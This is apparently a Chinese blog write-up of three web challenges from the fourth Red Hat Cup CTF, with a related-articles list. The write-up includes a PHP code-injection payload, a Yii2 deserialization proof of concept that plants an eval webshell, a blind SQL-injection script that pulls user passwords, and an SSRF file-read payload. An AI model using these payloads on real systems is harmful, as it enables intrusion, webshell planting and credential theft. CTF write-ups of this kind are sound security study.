前言

记录一下web的wp，随手写的，只会前三题，确实都很简单。

find_it

扫到robots.txt，发现1ndexx.php，直接访问不了，访问.1ndexx.php.swp得到源码，然后读flag：

?code=<?= show_source(glob('./*')[2]);

再访问hack.php：

base32解密一下即可得到flag。

framework

是个yii2的框架，扫出来www.zip下载源码，找到了反序列化的路由，yii2的反序列化之前审过了，直接拿POC打：

<?phpnamespace yii\rest{class IndexAction{public $checkAccess;public $id;public function __construct(){$this->checkAccess = 'assert';$this->id = 'file_put_contents("feng.php","<?php eval(\$_POST[0]);?>");exit();';}}
}
namespace yii\db{use yii\web\DbSession;class BatchQueryResult{private $_dataReader;public function __construct(){$this->_dataReader=new DbSession();}}
}
namespace yii\web{use yii\rest\IndexAction;class DbSession{public $writeCallback;public function __construct(){$a=new IndexAction();$this->writeCallback=[$a,'run'];}}
}namespace{use yii\db\BatchQueryResult;echo base64_encode(serialize(new BatchQueryResult()));
}

蚁剑连上去feng.php，然后拿出绕过disable_functions的插件，直接秒，然后/readflag：

WebsiteManger

f12看到<div class="avtar"><img src="data:image.php?id=3" width="200" height="200"/></div>

所以image.php存在SQL注入，经过一系列fuzz，写个python脚本跑一下：

"""
Author:feng
"""
import requestsurl='http://eci-2zefme7yqvztlaat6my5.cloudeci1.ichunqiu.com/image.php'flag=''
for i in range(1,100):length=len(flag)min=32max=128while 1:j=min+(max-min)//2if min==j:flag+=chr(j)print(flag)break#payload="if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flagx'),{},1))<{},sleep(0.5),1)".format(i,j)#payload="0/**/or/**/if(ascii(substr((select/**/group_concat(table_name)from/**/information_schema.tables/**/where/**/table_schema=database()),{},1))<{},1,0)".format(i,j)#payload="0/**/or/**/if(ascii(substr((select/**/group_concat(column_name)from/**/information_schema.columns/**/where/**/table_name='users'),{},1))<{},1,0)".format(i,j)payload="0/**/or/**/if(ascii(substr((select/**/group_concat(password)from/**/users),{},1))<{},1,0)".format(i,j)params={'id':payload}r=requests.get(url=url,params=params)#print(r.text)if len(r.text)>200:max=jelse :min=j"images,users"
"username,password"
"admin"  "d6ec745f9d22e6a9ee099"

然后直接登录，curl.php似乎是SSRF，直接读/flag：

host=file%3A%2F%2F%2Fflag&referer=

第四届红帽杯网络安全大赛 Web 部分writeup相关推荐

2021第四届红帽杯网络安全大赛-线上赛Writeup
文章目录 MISC 签到 colorful code WEB find_it framework WebsiteManger ezlight 记录一下被锤爆的一天-orz MISC 签到签到抢了个二 ...
2022第二届网刃杯网络安全大赛-Web
2022第二届网刃杯网络安全大赛-Web 前言提示:该内容由夜刃TEOT战队-夜白君师傅原创,禁止抄袭! 一.Web2-upload 难度系数:4.0 题目描述:只有想不到,没有做不到,sql yy ...
[CTFHub] 2021-第四届红帽杯网络安全大赛-Web-find_it
[CTFHub] 2021-第四届红帽杯网络安全大赛-Web-find_it 看群里说CTFHub上复现了, 我来看看本来想按照红帽杯的套路来试一下,发现phpinfo里莫得flag了只能想想其他 ...
CTFHub_2021-第四届红帽杯网络安全大赛-Web-WebsiteManger
CTFHub_2021-第四届红帽杯网络安全大赛-Web-WebsiteManger(布尔盲注.SSRF ) 场景描述:最新的网站测试器,作为非站长的你,能利用好它的功能吗? 场景打开后,如下,是个登 ...
i春秋网鼎杯网络安全大赛advanced题目writeup
今天打了护网杯发现啥也不会悲伤就想起来了未完成的网鼎杯来补坑(通过观摩大佬writeup) file命令查看是一个64位的ELF文件运行后无交互动作只输出 welcome ...
第三届广东省强网杯网络安全大赛WEB题writeup
1. 小明又被拒绝了直接访问根目录,报403错误一般是做了ip限制,加上 X-Forwarded-For 头即可绕过接着又提示不是管理员,仔细看响应头的 Set-Cookie ,有个 admin ...
第二届网刃杯网络安全大赛 Writeup
第二届网刃杯网络安全大赛 Writeup 前言 MISC 玩坏的XP * ISC ncsubj carefulguy easyiec xypo7 喜欢移动的黑客* LED_BOOM* 需要安全感* c ...
[2021首届“陇剑杯”网络安全大赛决赛]内存取证writeup
决赛不能联网-手上有只有vol2.6,这道题完全死了文章目录 [2021首届"陇剑杯"网络安全大赛决赛]内存取证 writeup 产品密钥匿名邮箱远控后门数据清除时间 [ ...
【2020年第二届“网鼎杯”网络安全大赛青龙组】Web AreUSerialz
[2020年第二届"网鼎杯"网络安全大赛青龙组]Web AreUSerialz http://94b1c2d4231f4b4bb92162d5e89dec8f5817750c48 ...

第四届红帽杯网络安全大赛 Web 部分writeup

前言

find_it

framework

WebsiteManger

第四届红帽杯网络安全大赛 Web 部分writeup相关推荐

最新文章

热门文章